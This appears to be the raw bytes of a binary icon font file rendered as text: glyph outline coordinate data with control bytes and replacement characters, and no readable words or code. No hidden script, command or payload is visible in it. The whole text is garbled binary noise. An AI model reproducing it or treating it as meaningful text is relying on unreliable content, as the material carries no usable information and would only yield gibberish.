	'D(-4:d�LL�d:7_�I ` Cw/�Fz[55[zFFz[55[zF				��
	�3
	3�(D'1�HL�d::d�LJ�c=@  @3+��5[zFFz[55[zFFz[5@				� ``BO54632#"&=.54671%.'1535#332>54&'77'2654&#"3�	
	
	/wC ` I�_7:d�LL�d:4-(D'�				��
	�3
	3�+3@  @=c�JL�d::d�LH�1'D(��				��
#.?2654&#"31+"&=46;>74&#'*#0*1013267'p�
�

��

	��--�2<2�� �
 
�
	
���Z
Z�x ���&+"&=46;?6&/&2654&#"3��
�

��X/	

0��$�y
 q-`
	
`����`�-8NYk32+"&/7;0410*1#'7'''&6?6'4"#"7+"&=46;>74&#'*#0*1013267'HX�

�
BL�2<2VX!g	

--
�

��

	��--�	2<2�����
 
�#� �$�$,D$�
	
hZ
Z�8
 
�
	
���Z
Z�m �����_�.9+"&=46;?6&/&'7;26=4&+''&6?6t�
�

��X,	

-r-X7XA
�

�X7�,	

-X*�s
 
w-Y
	
Y�Z-n��
 
�p(Y
	
Z,���@�%.%3'''33'54.#"77754632�=d<no`?}^<=^}>`A!8L++L8!�`p��p`�gIIg[��TST@����@RP+L8!!8L+P��``````@0IggI0���@�#54.#"#7''33/3�!8L++L8!d>ss>�\`�~>&?_\=>�0+L8!!8L+0 ��VV��O` ��#1��`O#���=@M32>54.#"15->32#".546732654&'
2654&#"3�c}:d�LL�d::d�L9��@ 9Fz[55[zFFz[5kU%/!!/%P�����eG-4''44'����z)))"6
6����P



���)63->32#".546732654&'52654&#"3� ��@@(L�d::d�LL�d:jV/!!/���������'44''4)CXg�



�a.@$0<I%9#"&54675#53#%'7'77'7'77'7'772654&#"3?$/!!/%� �i	��8998988�8998988�8998988I�,!//!,ki� ��v898998989899898989989���a.@".:%535#3532654&'%'7'77'7'77'7'77?��i� %/!!/$��8998988�8998988�8998988�v �i�k,!//!,898998989899898989989��@�$0Kn���%9#"&54675#53#%'7'77'7'77546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"32654&#"3�%/!!/%� �j
�9889988�9889988��& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				��,!//!,Ki� ��V899889988998899_ &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				�@��@�=Vbn{�546;232#!"&=46;32#!"&546;813!26=89535#3532654&'9%7'7''7'7''2654&#"32654&#"3�& %@

��

@  %%� %% % &@��j� %/!!/%�988998899889988)�				  &% 
 

 
 &�`%&�% &% ��V �i�K,!//!,899889988998899���				�� �"7DQ9.54>32'7#"&'12>54.#"351"&54632'2654&#"3@,4-Ni<<iN-4,�� ��"R,,R"�5]F((F]55]F((F]5PppPPppPB^^BB^^B�(o@<iN--Ni<@o(�7�������c(F]55]F((F]55]F(@pPPppPPp ^BB^^BB^�� � -:7#"&'11".54>32'2654&#"352654&#"3@��(b66b(�<iN--Ni<<iN--Ni<PppPPppPB^^BB^^B��`���"" -Ni<<iN--Ni<<iN-`pPPppPPp ^BB^^BB^�� �"7A9.54>32'7#"&'12>54.#"357'373@,4-Ni<<iN-4,�� ��"R,,R"�5]F((F]55]F((F]5p0`p00p`0�(o@<iN--Ni<@o(�7�������c(F]55]F((F]55]F(�J�@��@��� � *7#"&'12>54.#"357'373@��(b66b(�<iN--Ni<<iN--Ni<p0`p00p`0��`���"" -Ni<<iN--Ni<<iN-�J�@��@����B� *4IVc'.54>32'810"9'9.'77972>54.#"351"&54632'2654&#"3�7|�0:-Ni<;iO-:1�|8�!!=mS%n�=!n%Rl�5]F((F]55]F((F]5PppPOqqOB^^BB^^B@��|7j(tD<iN--Ni<Dt(��7|o��%S+��S%
(F]55]F((F]55]F(@pPPppPPp ^BB^^BB^���B�'4A'17'>791".54>32'2654&#"352654&#"3�7|&\3΀|8�2\&�<iN--Ni<;iO--Oi;OqqOPppPB^^BB^^B ��|7K"A��7|O"!-Ni<<iN--Ni<<iN-`pPPppPPp ^BB^^BB^���B� *4IS'.54>32'810"9'9.'77972>54.#"357'373�7|�0:-Ni<;iO-:1�|8�!!=mS%n�=!n%Rl�5]F((F]55]F((F]5p0`p00p`0@��|7j(tD<iN--Ni<Dt(��7|o��%S+��S%
(F]55]F((F]55]F(�J�@��@����B�'1'17'>792>54.#"357'373�7|&\3΀|8�2\&�;iO--Oi;<iN--Ni<p0`p00p`0 ��|7K"A��7|O"!-Ni<<iN--Ni<<iN-�J�@��@����^�*?LY926323#".54677>772>54.#"351"&54632'2654&#"3���!;��*0-Oh<<iN-0*��; ��5]F((F]55]F((F]5PppPOqqOB^^BB^^B-s��p��(l=<iN--Ni<=l'z��l����(E]65]E))E]56]E(@pPOqqOPp ]CB^^BC]���^�%2?.'1791".54>32'2654&#"352654&#"3"���$Z2����3Y$�<iN--Ni<<hO--Oh<OqqOPppPB^^BB^^BLTH�� (NZH��( ��-Ni<;iN..Ni;<iN-`pPOqqOPp ]CB^^BC]���^�*@J926323#".54677>772>54.#"3157'373���!;��*0-Oh<<iN-0*��; ��5]F((F]55]F((F]5p0`p00p`0-s��p��(l=<iN--Ni<=l'z��l����(E]65]E))E]56]E(�I�@��@����^�&0.'1792>54.#"3157'373"���$Z2����3Y$�<hO--Oh<<iN--Ni<p0`p00p`0LTH�� (NZH��( ��-Ni<;iN..Ni;<iN-�I�@��@�` <T_c1233267>7>7#"&'.'.'"&#&!4&+"4&5461546;2#!"&=33!26=!35�
"
-2	$	]gc^B B^��qO Oq&��% 
 
�� �	.K,I@B^^B"��J6`H PppP�`%%@@

@   ` 3>B!4&+"33267>7>7#"&'"&'.'1!#!"&=35i�qO Oq%O!-2%S(?��&��%@��T93@PppP	'/�@%%@   ����!6CGKO9.#"326732654&'%5!#5#"%!#"&5467>3312#"&546357%'%%fBPp��` BfY��^BB^I7���


- �DD��DD�%%=PpP
	8`@@P=m&: B^^B:X@@



`��!llll���� -159>;35!#"&'#"&546321"32654&#357%'fB `@��pPBf%%'



  �DD��DD�=P@@`8	
PpP=%%



`��!llll	` �@8Lck�����?.54>32"67>7>7&'.041>7>7269716322>7.'>7>.'0"17>#1023:1#96'>7.77>7.72799&'.#"#36.67>54&'.9>27.'.5�!?l�SS�l?-(
	,]bf50`_^-
�/_02Q*X/$a9�.C%O2/Z+���
"&(K"-
#. ": :	>CQ\24fb[*)_fm82_XQ$�O+Y[[.T�G%PRU,+XVU*�/m<S�l??l�SF~3
*
" 
(0)j@=`"[D',@l*��.p=,S&
&(X\`/$2c`\*D''PSS)	q(A/:'8 0+U)"/	,
�^/$$$`?�@ 4Og��%>74'9'>7.'9'.74>79%.67>54&'.1'.&67"63>32'1%>7.47671>7>>7>7&'.85>27.'.5{"6-Q"<�F"#8*X/8>
�!-07/a24+gq{?7g`V%,fnv<

?s`J��	0$":"?�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�$T/8"&$T1&CK-bfh45�M,S&�)>'+U)(8#,
9#5 
%J$%B\7�7olh/D'+Y[\,��" 
*
" 
)'/$$$  @:P0'.35.'.'2&#&15065&1506561&410'32613>>10&'.1QC
*'>V]CIWWI))F[[E.4�� !}R<dH((Hd<<dH(�
	
�	��



����o	$�
  @ 7H617#0'.'.'5&150653>>10&'.19.'.'5`IW[E()IW]C')�� !}R<dH((Hd<<dH(�'*))��
	��
	
��o	$�
�
	


��@�@Fb�%#5'7#537#537'7'#5'.54>32#"&'5732>54.#"#7<54632#*#73>54&#".54>32#"&'732654&#"   )+Kk Kk�` � '7`�II�`77`�I5b)'a5BuW22WuBBuW2!$�8((88(	"%% \#=R..R=##=R.!=1PppPPp
� gG)+   � `�gGY)b5I�`77`�II�`7"!2WuBBuW22WuB5a(�(88((8 %%"
t=".R=##=R..R=#pPPppP2�@�@Flw%#5'7#537#537'7'#5'.54>32#"&'5732>54.#"#732654&#"17'7<54632#*#'7>54&#"7   )+Kk Kk�` � '7`�II�`77`�I5b)H=!.R=##=R..R=#G$�11PppPPp
138((88(5"%%`� gG)+   � `�gGY)b5I�`77`�II�`7"H#=R..R=##=R."=GK1pPPppP21(88((825%%"�`` )>KXe%1".54>32'2>54.#"351".54>32'2654&#"351"&54632'2654&#"3I�`77`�II�`77`�IBuW22WuBBuW22WuB.R=##=R..R=##=R.PppPPppP(88((88(%%%%`7`�II�`77`�II�`7 2WuBBuW22WuBBuW2`#=R..R=##=R..R=# pPPppPPp`8((88((8 %%%%�`` )6CP%1".54>32'2>54.#"351"&54632'2654&#"352654&#"3I�`77`�II�`77`�I.R=##=R..R=##=R.PppPPppP(88((88(%%%%`7`�II�`77`�II�`7�#=R..R=##=R..R=# pPPppPPp`8((88((8 %%%%��`�(773!267!%!#!"&5!3	7#5%1>101!067130&546101�
2�2
��;@K5�`5K@ @���Hx  ��U7�W/�$$ 5KK5�@ �� �@x8�llT�Ni]SMMzGZ��`�!#!"&5!3!1!0&54610 @K5�`5K@ @���H   xH5KK5�@ x�Tll�8x`_�@!$'5Dj%3265!#!>7.'1362!+977#5%1>101!067130&546101>7>>7>7&'.85>27.'.5�5K�� ��
	��
2}:����Hx  ��U7�W/�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�K5� &$� �� �@x8�llT�Ni]SMMzGZ�Z" 
*
" 
)'/$$$`?�@'Mb%3265!#!>297!1!0&54610>7>>7>7&'.85>27.'.5�5K�� ��
,[\^/$G"����H   xH�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�K5� &� x�Tll�8x�" 
*
" 
)'/$$$�@@  $3A]y37#130654&'#73>54&#"37#130654&'#73>54&#"1#0&546154&546320!1#0&546154&546320�>@$3Z3$[D''��>@$3Z3$[D''�@�@@ 0000 @�@�@@ 0000 @@`cCUllUCc�())(`@`cCUllUCc�())(��a��a`@0<$55$<0@`a��a`@0<$55$<0@`�@@ #1?53130654&''.54632#53130654&''.54632#��� @�@ �0000����� @�@ �0000�@@ c?a��a?c�!2552!`@@ c?a��a?c�!2552!@ ?CQ^kx�%9.5467.'#130671#0&546154&546320>32#"&'137#'3>54&#"2654&#"352654&#"32654&#"332654&#"3�
[$3Z
�@@ 0000 %/IggI#=x>@D''�<TT<<TT<				 				@				�4&B&9cCUl�a`@0<$55$<0@C7gIIg�@ ())(�T<<TT<<T�				@								@ )6CP]%1#0&546713953'.54632#1"&546322654&#"32654&#"332654&#"3��@ �/;("���0000�IggIIggI				 				@				Q	�a?ca:0R�@@`!2552!��gIIggIIg				@								� �@;?]z14132653#".505#53!#"&=35#330"32>5#535#;26?62;26=4&#!"1%2+"&/&"+"&=463!^BB^`(F]55]F(@� qOPp@�@#=R.EE.R=#   � ^B 
9*8 B^gI��Ig�<TK5 8L9 5KT<@ //B^^B ��5]F((F]5]]``PppP    .R=##=R.` ��B^RR^BIggI�T<5KQ##QK5<T� �@"@]z35#34132>5##"&50553;26?62;26=4&#!"1%2+"&/&"+"&=463!2+2&'&"63#"&=463!@�@(F]55]F(`^BB^` �^B 
9*8 B^gI��Ig�<TK5 8L9 5KT<@.B8( 9"n"9 (8B.@ ``]]5]F((F]5 ��B^^B//���PB^RR^BIggI�T<5KQ##QK5<T A/(8Q11Q8(/A��`3|���''"#*1"3!26506.#"#"&#"''#"4&'.+"&'.5:32677'>74277'461>77'>77'>703267>7#!"&'3267>;.5463:3:3;2+%243267>7>300101#"&'.1'>3�00(8K5`&7!HH$1��.21�	

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>+8(5K&ZlZ??
^'
! l

		&
�

��`Gdw�1''1'"#*#1;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=3!26506'#0#!>3232632#"&'0&'1�!  	�/a�		$P,F\  �(87�#	o;#`&�n($D"��y
$HH!7
	 H(;N/31..-2
	"T#B0
21O8(	
�#&??
8)	���`K����''"#*1";35335335335335335326506.#"#"&#"''#"4&'.+"&'.5:32677'>74277'461>77'>77'>703267>7#!"&'3267>;.5463:3:3;2+%243267>7>300101#"&'.1'>31�00(8K5@ @ @ @ @ @  &7!HH$1��.21�	

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>8(5K            &ZlZ??
F'
! l

		&
�

���`Gd��1''1'"#*#1;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=;35335335335335335326506'#0#!>3232632#"&'0&'1�!  	�/a�		$P,F\  �(87�#	o;#@ @ @ @ @ @  &�n($D"��y
$HH!7
	 H(;N/31..-2
	"T#B0
21O8(	
�#            &??
8)	`��`A�����''"#*1";#"&5#3!5#5326506.#"#"&#"''#"4&'.+"&'.532677'>74277'461>77'>77'>703267>79#!"&'3267>;.546;:3;2+%243267>7>300101#"&'.1'>39!!�00(8K5@�
 %��&7!HH$1��.21�

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>�`��8(5K@
% @&ZlZ??
F'
! l

		&
�

��@`��` $i��#"&5#3!5#5326506'#0#!;3!!1''1'"+;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=%>3232632#"&'0&'9@�
 &���&�n($D"��;#@ `��b!   �/a�		$P,F\  �(87�#	

$HH!7
	 H(;N@
& @&#@o31..-2
	"T#B0
21O8(	
v??
8)	`���!C3!2654&'14654&#".#"1%#!"&54671<54>32>329�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH`��� #!"&54671<54>32>321`*6^B��B^6*#=R.7^/Hg�O1B^^B1O.R=#1)eH`���!I^m}��1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<3	@		@	Y.-
�		

�
-
.`���&:IYhw1#!"&5467<54>321>32'<54&#">321"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.`���!Wu1.54632>321#!"&5467%>7>7#"&5467.#"3!2654&'.'9'9.#".'.54673:3�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�	Pp:/T<

E-5KK5-F
�+		T<
^>

#=R.O1B^^B1O%@

$/JIg`���4Q1#!"&5467<54>32.5467>73267'>7*#"&5<5>321)*6^B��B^6*#=R.3L9		T<
Ig*6

/1p@%O1B^^B1O.R=#

>^
<T		+gIJ/$

`��"DSbq��3!2654&'14654&#".#"9%#!"&54671<54>32>329"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��	
	
`	
	
`	
	
`	
	
`	
	
�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH��	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��!0?N]l#!"&54671<54>32>329"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#`*6^B��B^6*#=R.7^/Hg��	
	
`	
	
`	
	
`	
	
`	
	
�O1B^^B1O.R=#1)eH��	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��!I^m|�������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�P	
	
`	
	
`	
	
`	
	
`	
	
`	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	 	@		@	Y.-
�		

�
-
.`���&:IYhw1#!"&5467<54>321>32'<54&#">321"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.`��"Xv�����9.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:3"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�A	
	
`	
	
`	
	
`	
	
`	
	
�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��5Rap��9#!"&5467<54>32.5467>33267'>7*#"&5<5>321"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�A	
	
`	
	
`	
	
`	
	
`	
	
pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`����"DQ^kx�3!2654&'14654&#".#"9%#!"&54671<54>32>329"32654&#"32654&#7"32654&#"32654&#7"32654&#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��



`



�



`



`



�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH��



`



`



`



`



`����!.;HUb#!"&54671<54>32>329"32654&#"32654&#7"32654&#"32654&#7"32654&#`*6^B��B^6*#=R.7^/Hg��



`



�



`



`



�O1B^^B1O.R=#1)eH��



`



`



`



`



`����!I^kx�������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"32654&#"32654&#7"32654&#"32654&#7"32654&#"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�@



`



�



`



`



p	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��



`



`



`



`



@	@		@	Y.-
�		

�
-
.`����'<K[jy�����9#!"&5467<54>321>32'<54&#">329"326=4&#.2?64'14&+";265%2764/&"32654&#"32654&#7"32654&#"32654&#7"32654&##*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
Y



`



�



`



`



yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.�



`



`



`



`



`����!Wu�����1.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:3"32654&#"32654&#7"32654&#"32654&#7"32654&#�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�1



`



�



`



`



�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg��



`



`



`



`



`����5R_ly��9#!"&5467<54>32.5467>33267'>7*#"&5<5>321"32654&#"32654&#7"32654&#"32654&#7"32654&#)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�1



`



�



`



`



pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

��



`



`



`



`



`����.R37#737#7##"&54671.54632>321#32654&'1.#".#"1;7"Q�/RI}1>`p0�Tl5K9*pP8[4<T)8K5��B^6*gH/^7.R=#*6^B�Q� ��@`��K5-F
	Pp:/T<

E-5K ^B1OHe)1#=R.O1B^��`����+37#7332654&'1.#".#"1;7"Q�/RI}1�B^6*gH/^7.R=#*6^B�Q� ��`^B1OHe)1#=R.O1B^��`����.Xm|���7#37#32654&'14654&#".#"1;733#"&5467<54>321>321+7<54&#">329"326=4&#.2?64'14&+";265%2764/&"1}IR/�Q>�5K8)T<4[8Pp*9K5lT�0p��B^6*#=R.
U5Ig#*6^B��QOT<*D3/(�	
	
�
.
.Z	@		@
��.
.
 ����@K5-E

<T/:pP	
F-5K�^B1O.R=#-8gIF(O1B^���<T,#'
	3	@		@	Y.-
�		

�
-
.`����1FUet�7#37##"&5467<54>321>321+7<54&#">329"326=4&#.2?64'14&+";265%2764/&"1}IR/�Qq�B^6*#=R.
U5Ig#*6^B��QOT<*D3/(�	
	
�
.
.Z	@		@
��.
.
 ����`^B1O.R=#-8gIF(O1B^���<T,#'
	3	@		@	Y.-
�		

�
-
.`����.f�7#37#32654&'14654&#".#"1;733#"&5467<54>32.5467>732671+7>7*#"&5<5>329"1}IR/�Q>�5K8)T<4[8Pp*9K5lT�0p��B^6*#=R.3L9		T<
*6^B��Q^Ig*6

/1 ����@K5-E

<T/:pP	
F-5K�^B1O.R=#

>^
<T		+@%O1B^���gIJ/$

`����?]7#37##"&5467<54>32.5467>732671+7>7*#"&5<5>329"1}IR/�Qq�B^6*#=R.3L9		T<
*6^B��Q^Ig*6

/1 ����`^B1O.R=#

>^
<T		+@%O1B^���gIJ/$

`����"D[s�3!2654&'14654&#".#"9%#!"&54671<54>32>3294&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg`K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�-5KK5(88((8 K5 (88(%%% 8(�%%


 %`����!8Pl#!"&54671<54>32>3294&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21`*6^B��B^6*#=R.7^/Hg`K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%�O1B^^B1O.R=#1)eH�-5KK5(88((8 K5 (88(%%% 8(�%%


 %`����!CP]jw��3!2654&'14654&#".#"1%#!"&54671<54>32>329132654&104610#"&5132654&104610#"&57132654&104610#"&5�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��(()'PP 00�(()'PP 00�(()'PP 00�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�2*,"YY!::!*,"YY!::*,"YY!::`���� -:G#!"&54671<54>32>3214610#"&54610#"&574610#"&5`*6^B��B^6*#=R.7^/Hg��PP')((�PP')((�PP')((�O1B^^B1O.R=#1)eH�2"YY",* "YY",* "YY",*
`����!I^kx��������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32132654&104610#"&5132654&104610#"&57132654&104610#"&5"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T��(()'PP 00�(()'PP 00�(()'PP 00P	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��*,"YY!::!*,"YY!::*,"YY!::�	@		@	Y.-
�		

�
-
.	`����&:GTap���1#!"&5467<54>321>32'<54&#">3214610#"&54610#"&574610#"&5"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(��PP')((�PP')((�PP')((0	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	��"YY",* "YY",* "YY",*�	@		@	Y.-
�		

�
-
.	`����!Wu������1.54632>321#!"&5467%>7>7#"&5467.#"3!2654&'.'9'9.#".'.54673:3132654&104610#"&5132654&104610#"&57132654&104610#"&5�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI��(()'PP 00�(()'PP 00�(()'PP 00�	Pp:/T<

E-5KK5-F
�+		T<
^>

#=R.O1B^^B1O%@

$/JIg��*,"YY!::!*,"YY!::*,"YY!::`����4Q^kx1#!"&5467<54>32.5467>73267'>7*#"&5<5>3214610#"&54610#"&574610#"&5)*6^B��B^6*#=R.3L9		T<
Ig*6

/1��PP')((�PP')((�PP')((p@%O1B^^B1O.R=#

>^
<T		+gIJ/$

��"YY",* "YY",* "YY",*`����!Cs��3!2654&'14654&#".#"1%#!"&54671<54>32>32954&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�
	


	

a
	


	

�
	


	

�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�y$		$
$		$
$		$
$		$
2$		$
$		$
`���� P��#!"&54671<54>32>32154&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.`*6^B��B^6*#=R.7^/Hg�
	


	

a
	


	

�
	


	

�O1B^^B1O.R=#1)eH�y$		$
$		$
$		$
$		$
2$		$
$		$

`����!I^����
+1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>3254&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'."326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�`
	


	

a
	


	

�
	


	

1	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��$		$
$		$
$		$
$		$
2$		$
$		$
b	@		@	Y.-
�		

�
-
.	`����&:j�����1#!"&5467<54>321>32'<54&#">32154&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'."326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�`
	


	

a
	


	

�
	


	

1	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	��$		$
$		$
$		$
$		$
2$		$
$		$
b	@		@	Y.-
�		

�
-
.`����!Wu��1.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:354&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�Q
	


	

a
	


	

�
	


	

�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg��$		$
$		$
$		$
$		$
2$		$
$		$
`����4P���1#!"&5467<54>32.5467>33267'>7*#"&5<5>3254&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�Q
	


	

a
	


	

�
	


	

pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

��$		$
$		$
$		$
$		$
2$		$
$		$
`@� X��%#"3!2654&+4&#".#"732654&'14654&#".#"11>7<14632>329.5467<54>32>71<14632>321++#!"&5467932654&+4&#".#"1#"1>329	%
!%�	�5K8)T<4[8Pp*9$	8('
 1
��")6*#=R.9	8('
 1
(/!	
*6^B�/!�!/�%
!%	/)G�%%	
K5-E

<T/:pP	
F-$;(8$'G+1O.R=#(8$-!/'O1B^!//!�%%			#`@� Ty%#!"&54671<14632>327132654&'1.#".#"1>71>32:329>54&'1.#".#"01>321�(/!�!/%8('
 1
*�B^6*gH/^7.R=#*6G/+%=\(
1 
'(8

*?f�-!//!,(8$
1 ^B1OHe)1#=R.O1"<-=&+)-$8(			D6`���Bd5463232+#"&=#"&5463'3!2654&'14654&#".#"9%#!"&54671<54>32>329	
P
	P	
P
	�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�P
	P	
P
	P	
=
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH`���A#";326=32654&+54&#"%#!"&54671<54>32>329P	
P
	P	
P
	`*6^B��B^6*#=R.7^/Hg�
	P	
P
	P	
O1B^^B1O.R=#1)eH`���"DS3!2654&'14654&#".#"9%#!"&54671<54>32>329";2654&+�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�P	
�	
��
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eHS
	
	`���!0#!"&54671<54>32>329";2654&+`*6^B��B^6*#=R.7^/Hg�P	
�	
��O1B^^B1O.R=#1)eHS
	
	`���"DS`3!2654&'14654&#".#"9%#!"&54671<54>32>329%"326=4&#"&54632#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��	
	
	
	
�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH-	�		�	�
	
	`���.=12654&#"%#!"&54671<54>32>329%"326=4&#
	
	W*6^B��B^6*#=R.7^/Hg��	
	
	
	
�O1B^^B1O.R=#1)eH-	�		�	
`���=EOX`ow���<54671<5<51045465>32>321#!"&'.5<517!4&'!1!>7!1!.''3.#"1!.'!*'9%3.#"!645<'1!.'"#!*'13!267!`6*&<M,7^/Hg*6Z<��=Y  �����L��66KU��j�..��\�m
�
�@, ,�641O*J71)eHO1:OO:(		@		 _	`?		�	`���!(1:DMU>5!!1!.'>321!>7!'.#"1!>71!4671!>7!1!>7#!"&'���Z
	��	�/4��:*:  :
�|��a�	��	�3��1��1  		�
	 `	@@		@�`@�@CKU^fu}��������%1#!"&'.5<5<5467<5<50454651>321>321%!4&'!1!>7!1!.''3.#"1!.'!*'9%3.#"!645<'1!.'"#!*'13!267!<54&#">329"326=4&#.2?64'14&+";265%2764/&�Z<��=Y6*&<M,
U5Ig#*6�� �����L��66KU��j�..��\�m
�
�@, ,�6UT<*D3/(�	
	
�
.
.Z	@		@
��.
.
�:OO:1O*J7-8gIF(O1(		@		 _	`?		��<T,#'
	3	@		@	Y.-
�		

�
-
.`@�@	AKU`ir����>71!!1!>5!1!6454&#"1.#"3.'>321.#".'!1!.'!1!4&'!1!.'1!.'1!3!267!"326=4&#.2?64'14&+";265%2764/&cF��Z���7gI5U
 :�	D*<T(/��-�
����i"	 	�  	F	�1 1� �	
	
�
.
.Z	@		@
��.
.
 @	Ig8-	#,T<	

@	@@		�		 �	@		@	Y.-
�		

�
-
.`@� QYclt������%1#!"&'.5<5<5467<5<5<54651>32.5467>332671%!4&'!1!>7!1!.''3.#"1!.'!"&#9%3.#"!645<'1!.'"#!*'13!267!>7*#"&5<5>321�Z<��=Y6*&<M,3L9		T<
*6�� �����L��66KU��j�..��\�m
�
�@, ,�6dIg*6
